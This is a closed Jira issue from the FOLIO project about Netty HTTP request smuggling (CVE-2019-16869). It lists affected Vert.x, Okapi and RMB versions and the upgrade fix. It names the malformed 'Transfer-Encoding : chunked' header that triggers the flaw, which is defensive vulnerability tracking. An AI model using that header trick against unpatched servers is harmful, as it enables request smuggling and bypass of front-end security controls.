[FOLIO-2368] Netty HTTP request smuggling security vulnerability CVE-2019-16869 Created: 28/Nov/19 Updated: 10/Aug/20 Resolved: 15/Jun/20 |
|
| Status: | Closed |
| Project: | FOLIO |
| Components: | None |
| Affects versions: | None |
| Fix versions: | None |
| Type: | Bug | Priority: | P2 |
| Reporter: | Julian Ladisch | Assignee: | Unassigned |
| Resolution: | Done | Votes: | 0 |
| Labels: | security | ||
| Remaining Estimate: | Not Specified | ||
| Time Spent: | Not Specified | ||
| Original estimate: | Not Specified | ||
| Issue links: |
|
||||||||||||
| Sprint: | DevOps: Sprint 95 | ||||||||||||
| Development Team: | Core: Platform | ||||||||||||
| Description |
|
Netty before 4.1.42.Final mishandles whitespace before the colon in HTTP headers (such as a "Transfer-Encoding : chunked" line), which leads to HTTP request smuggling. CVSS 3.x Severity and Metrics: https://nvd.nist.gov/vuln/detail/CVE-2019-16869 Fix: Update Netty to 4.1.42.Final Vert.x below 3.8.3 uses Netty 4.1.39.Final and is affected. Okapi below 2.34.0 uses Vert.x 3.8.1 and is affected: https://github.com/folio-org/okapi/pull/849 , RMB up to 29.0.1 uses Vert.x 3.8.1 and is affected: https://github.com/folio-org/raml-module-builder/blob/07c76c4/pom.xml#L69 All modules that use an RMB version up to 29.0.1 are affected. |
| Comments |
| Comment by Julian Ladisch [ 15/Jun/20 ] |
|
The minimum RMB version for Fameflower was 29.3.0: https://folio-org.atlassian.net/wiki/display/COMMUNITY/Q1+2020+%28Fameflower%29+Release+Notes |